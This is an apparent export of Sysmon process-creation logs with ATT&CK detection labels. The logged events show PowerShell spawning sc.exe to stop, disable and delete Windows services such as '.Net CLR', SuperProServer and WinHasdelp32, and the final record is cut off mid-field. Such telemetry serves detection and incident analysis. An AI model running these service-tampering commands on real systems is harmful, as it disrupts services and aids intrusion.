Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.212043600Z"",""eventRecordID"":""2464"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.209\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010fe581e00}\r\nProcessId: 2056\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHasdelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.209"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010fe581e00}"",""processId"":""2056"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHasdelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.492",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.175 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010bc561e00} +ProcessId: 6660 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.177655300Z"",""eventRecordID"":""2462"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.175\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010bc561e00}\r\nProcessId: 6660\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.175"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010bc561e00}"",""processId"":""6660"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.417",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.123 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-001053531e00} +ProcessId: 5928 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.127192500Z"",""eventRecordID"":""2459"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.123\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-001053531e00}\r\nProcessId: 5928\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.123"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-001053531e00}"",""processId"":""5928"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.353",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: 
+RuleName: +UtcTime: 2020-05-28 12:50:03.033 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-001046501e00} +ProcessId: 3460 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.035954600Z"",""eventRecordID"":""2457"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.033\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-001046501e00}\r\nProcessId: 3460\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.033"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-001046501e00}"",""processId"":""3460"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.323",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.019 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010ce4e1e00} +ProcessId: 6864 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net 
CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.021879400Z"",""eventRecordID"":""2456"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.019\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010ce4e1e00}\r\nProcessId: 6864\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.019"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010ce4e1e00}"",""processId"":""6864"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.275",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.974 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010614c1e00} +ProcessId: 6548 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.977914600Z"",""eventRecordID"":""2453"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.974\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010614c1e00}\r\nProcessId: 6548\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:02.974"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010614c1e00}"",""processId"":""6548"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.229",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.926 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010dc491e00} +ProcessId: 7300 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.929374500Z"",""eventRecordID"":""2450"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.926\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010dc491e00}\r\nProcessId: 7300\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 